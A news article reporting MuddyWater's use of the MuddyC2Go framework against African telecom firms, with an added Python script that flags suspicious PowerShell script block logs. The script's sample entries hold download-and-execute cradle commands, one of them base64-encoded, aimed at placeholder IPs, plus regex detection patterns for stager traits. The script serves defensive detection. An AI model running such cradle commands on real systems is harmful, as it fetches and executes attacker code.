The Iranian nation-state actor known as MuddyWater has leveraged a newly discovered command-and-control (C2) framework called MuddyC2Go in its attacks on the telecommunications sector in Egypt, Sudan, and Tanzania.
The Symantec Threat Hunter Team, part of Broadcom, is tracking the activity under the name Seedworm, which is also tracked under the monikers Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (formerly Mercury), Static Kitten, TEMP.Zagros, and Yellow Nix.
Active since at least 2017, MuddyWater is assessed to be affiliated with Iran's Ministry of Intelligence and Security (MOIS), primarily singling out entities in the Middle East.
The cyber espionage group's use of MuddyC2Go was first highlighted by Deep Instinct last month, which described it as a Golang-based replacement for PhonyC2, itself a successor to MuddyC3. However, there is evidence to suggest that it may have been in use as early as 2020.
While the full extent of MuddyC2Go's capabilities is not yet known, the executable comes fitted with a PowerShell script that automatically connects to Seedworm's C2 server, thereby giving the attackers remote access to a victim system and removing the need for manual execution by an operator.
The latest set of intrusions, which took place in November 2023, has also been found to rely on SimpleHelp and Venom Proxy, alongside a custom keylogger and other publicly available tools.
Attack chains mounted by the group have a track record of weaponizing phishing emails and known vulnerabilities in unpatched applications for initial access, followed by reconnaissance, lateral movement, and data collection.
In the attacks documented by Symantec against an unnamed telecommunications organization, the MuddyC2Go launcher was executed to establish contact with an actor-controlled server, while legitimate remote access software such as AnyDesk and SimpleHelp was also deployed.
The entity is said to have been previously compromised by the adversary earlier in 2023, in an intrusion in which SimpleHelp was used to launch PowerShell, deliver proxy software, and also install the JumpCloud remote access tool.
"In another telecommunications and media company targeted by the attackers, several incidents of SimpleHelp were used to connect to known Seedworm infrastructure," Symantec noted. "A custom build of the Venom Proxy hacktool was also executed on this network, as well as the new custom keylogger used by the attackers in this activity."
By using a combination of bespoke, living-off-the-land, and publicly available tools in its attack chains, the group aims to evade detection for as long as possible in order to meet its strategic objectives, the company said.
"The group continues to innovate and develop its toolset when required in order to keep its activity under the radar," Symantec concluded. "The group still makes heavy use of PowerShell and PowerShell-related tools and scripts, underlining the need for organizations to be aware of suspicious use of PowerShell on their networks."
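Symantec's closing advice about watching for suspicious PowerShell use can be turned into a first-pass triage of script block logs. The following is an added example, not Symantec's tooling and not code from the article: it scores constructed Event ID 4104-style entries against a few widely known stager traits (download cradles, Invoke-Expression, encoded commands, hidden windows) and decodes any -EncodedCommand payload so that the inner script is scored as well, since the encoded form alone would otherwise hide the cradle. The rule weights, the alert threshold, and every host name, IP address (RFC 5737 test ranges) and script in the sample set are assumptions made up for this example.

```python
import base64
import re

# -EncodedCommand and the abbreviations PowerShell accepts, followed by a
# base64 token of plausible length (the payload is UTF-16LE text).
ENCODED_RE = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/]{16,}={0,2})", re.I
)

# Detection rules: rule name -> compiled pattern.
RULES = {
    "download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer",
        re.I,
    ),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "hidden_window": re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I),
    "no_profile": re.compile(r"-NoP(?:rofile)?\b", re.I),
    "policy_bypass": re.compile(r"-E(?:xecution)?P(?:olicy)?\s+Bypass", re.I),
    "encoded_command": ENCODED_RE,
}

# Illustrative weights (assumption): strong indicators 3, supporting ones 1-2.
WEIGHTS = {
    "download_cradle": 3,
    "invoke_expression": 3,
    "encoded_command": 2,
    "base64_decode": 2,
    "policy_bypass": 2,
    "hidden_window": 1,
    "no_profile": 1,
}


def encode_command(command: str) -> str:
    # UTF-16LE base64, the form PowerShell expects for -EncodedCommand.
    # Used here only to construct a realistic sample log entry.
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_commands(script: str) -> list:
    # Return the decoded text of every -EncodedCommand payload in a script.
    decoded = []
    for token in ENCODED_RE.findall(script):
        try:
            decoded.append(base64.b64decode(token, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not a genuine encoded command; ignore the token
    return decoded


def analyse_script(script: str, depth: int = 0) -> dict:
    # Score one script block, recursing into decoded payloads (max 3 levels).
    hits = {name for name, rx in RULES.items() if rx.search(script)}
    decoded_layers = []
    if depth < 3:
        for inner in decode_encoded_commands(script):
            inner_result = analyse_script(inner, depth + 1)
            hits |= inner_result["hits"]
            decoded_layers.append(inner)
            decoded_layers.extend(inner_result["decoded"])
    return {"hits": hits, "score": sum(WEIGHTS[h] for h in hits), "decoded": decoded_layers}


def scan_events(events: list, threshold: int = 4) -> list:
    # Return findings for events whose score reaches the threshold.
    findings = []
    for ev in events:
        result = analyse_script(ev["script"])
        if result["score"] >= threshold:
            findings.append({"id": ev["id"], "host": ev["host"], "score": result["score"],
                             "hits": sorted(result["hits"]), "decoded": result["decoded"]})
    return findings


# Constructed sample entries in the style of script block logging (Event ID
# 4104). Hosts, IPs and scripts are all made up for this example.
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws01", "script": "Get-ChildItem C:\\Users | Select-Object Name"},
    {"id": 2, "host": "ws02", "script":
        "$c = New-Object Net.WebClient; IEX $c.DownloadString('http://198.51.100.7/x.ps1')"},
    {"id": 3, "host": "srv01", "script":
        "powershell.exe -NoP -W Hidden -EncodedCommand "
        + encode_command("(New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage')")},
    {"id": 4, "host": "ws03", "script": "Get-Service | Where-Object Status -eq 'Running'"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"event {f['id']} on {f['host']}: score={f['score']} hits={f['hits']}")
        for layer in f["decoded"]:
            print("  decoded payload:", layer)
```

Run against the sample set, only events 2 and 3 cross the threshold; the plain administrative commands score zero. Administrators and management agents legitimately use -EncodedCommand and -WindowStyle Hidden, so a scorer like this belongs in the enrichment stage of a SIEM pipeline, where the decoded payload is surfaced for an analyst, rather than in a blocking control. It also presumes that PowerShell script block logging is actually enabled on the endpoints; without that, there is no Event ID 4104 to scan.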
The development comes as an Israel-linked group called Gonjeshke Darande (meaning "Predatory Sparrow" in Persian) claimed responsibility for a cyber attack that disrupted a "majority of the gas pumps throughout Iran" in response to the "aggression of the Islamic Republic and its proxies in the region."
The group, which reemerged in October 2023 after going quiet for nearly a year, is believed to be linked to the Israeli Military Intelligence Directorate, having conducted destructive attacks in Iran against targets including steel facilities, petrol stations, and rail networks in the country.
The cyber attack also follows an advisory from the Israel National Cyber Directorate (INCD) that accused Iran and the pro-Hamas group Hezbollah of unsuccessfully attempting to disrupt Ziv Hospital, attributing the attack to threat actors named Agrius and Lebanese Cedar.
"The attack was carried out by the Iranian Ministry of Intelligence with the involvement of Hezbollah's 'Lebanese Cedar' cyber units under the leadership of Mohammad Ali Merhi," the INCD said.